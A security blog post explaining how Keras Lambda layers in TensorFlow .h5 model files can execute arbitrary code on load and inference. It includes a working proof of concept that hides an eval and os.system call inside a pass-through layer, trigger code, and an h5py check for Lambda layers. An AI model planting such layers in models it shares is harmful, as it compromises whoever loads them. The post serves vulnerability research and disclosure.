March 31, 2025

Exposing Keras Lambda Exploits in TensorFlow Models

# AI Model File Formats
# Model File Vulnerability
# Model Format Vulnerability
# Python
# TensorFlow
# Keras Lambda Layers

Unveiling how Keras Lambda layers in TensorFlow models can be exploited to execute arbitrary code.

Ethan Silvas

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.


The Vulnerability Explained

TensorFlow lets you save neural network models that contain Keras Lambda layers, which implement custom logic as arbitrary Python code. That flexibility cuts both ways: because the layer can run any Python it likes, a malicious actor can hide a dangerous payload inside what looks like a normal model file. When the model is loaded and used for inference, the hidden code executes immediately on the victim’s machine.
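For context, a Lambda layer on its own is a perfectly normal tool: it wraps a small Python function so that it runs as part of the model. The minimal (and benign) sketch below simply doubles its input, just to show where the custom code lives:

import tensorflow as tf
from tensorflow.keras.layers import Lambda

# A legitimate Lambda layer: the wrapped Python function becomes part of the model.
double = Lambda(lambda x: x * 2.0)
print(double(tf.constant([[1.0, 2.0]])))  # prints a tensor containing [[2. 4.]]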


The Technical Breakdown

How It Works

When you save a TensorFlow model that uses a Keras Lambda layer, the function inside that layer is serialized (as marshaled Python bytecode) into the HDF5 file, commonly with a .h5 extension. When the model is later loaded and run for inference, that code executes, often without any obvious sign of trouble. An attacker can leverage this behavior to embed arbitrary OS commands that fire as soon as the model is used.


The Proof-of-Concept (PoC)

Our PoC demonstrates how this vulnerability can be exploited. In this example, a malicious Lambda layer is used to execute a system command that creates a file (/tmp/poc) when the model is loaded and inference is performed.


Step 1: Crafting the Malicious Model


import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Lambda

# Create a model with a Lambda layer that executes malicious code.
# os.system() returns 0, so "eval(...) or x" runs the payload and then
# passes the layer input straight through, keeping the model functional.
model = Sequential([
    tf.keras.Input(shape=(1,)),
    Lambda(lambda x: eval("__import__('os').system('touch /tmp/poc')") or x),
])

# Save the model to an HDF5 file; the Lambda function is serialized along with it.
model.save("lambda_model.h5")

In this snippet, the Lambda layer is defined with a function that uses eval to execute a system call and then passes its input through unchanged, so the layer still behaves like a harmless identity layer. When the model is saved, the malicious code is embedded within the .h5 file.
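You don’t have to load (and therefore trust) the model to see that something is embedded in it. As a minimal sketch, assuming a Keras 2-style HDF5 file that stores the architecture JSON in its model_config attribute, you can inspect the saved file directly with h5py:

import json
import h5py

# Read the architecture JSON straight from the HDF5 attributes,
# without deserializing (or executing) any layer code.
with h5py.File("lambda_model.h5", "r") as f:
    model_config = json.loads(f.attrs["model_config"])

# Flag any Lambda layers; their config carries the serialized Python function.
for layer in model_config["config"]["layers"]:
    if layer["class_name"] == "Lambda":
        print("Suspicious Lambda layer found:", layer["config"].get("name"))

A Lambda layer showing up in a model file you didn’t build yourself is a cheap first thing to check for.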


Step 2: Triggering the Payload


import tensorflow as tf
from tensorflow.keras.models import load_model

# Load the malicious model; the embedded Lambda function is deserialized with it.
model = load_model("lambda_model.h5")

# Perform inference to trigger the payload.
input_data = tf.constant([[1.0]])
output = model(input_data)

When the model is loaded and inference is run, the malicious code in the Lambda layer executes automatically—creating /tmp/poc on the victim’s machine. In a real-world scenario, an attacker could replace this benign command with something far more damaging, such as launching a reverse shell or modifying system files.
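If you ran the PoC locally, a quick way to confirm the payload actually fired is to check for the dropped file:

import os

# The PoC payload created this file as its proof of execution.
print("payload executed:", os.path.exists("/tmp/poc"))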


Why This Matters

For bug bounty hunters, this isn’t just an academic example—it's a prime opportunity to cash in on the vulnerabilities lurking in AI/ML tools. Here’s why:

  1. A Launchpad for Discovery: Use this PoC as a springboard. Dig into other model formats and custom layers; you’re bound to uncover similar, exploitable flaws.
  2. Lucrative Bounties: With huntr offering up to $3,000 per validated MFV, each discovery not only boosts your reputation but also adds to your earnings.


Conclusion

The Keras Lambda layer vulnerability demonstrates that AI/ML models are more than just data—they can serve as conduits for executing arbitrary code. By understanding how this exploit works, you can better scout for similar vulnerabilities and help secure the ecosystem while earning rewards.

If you’ve discovered a new way to exploit model files or have a fresh twist on this vulnerability, submit your proof-of-concept and detailed report. Happy hunting!
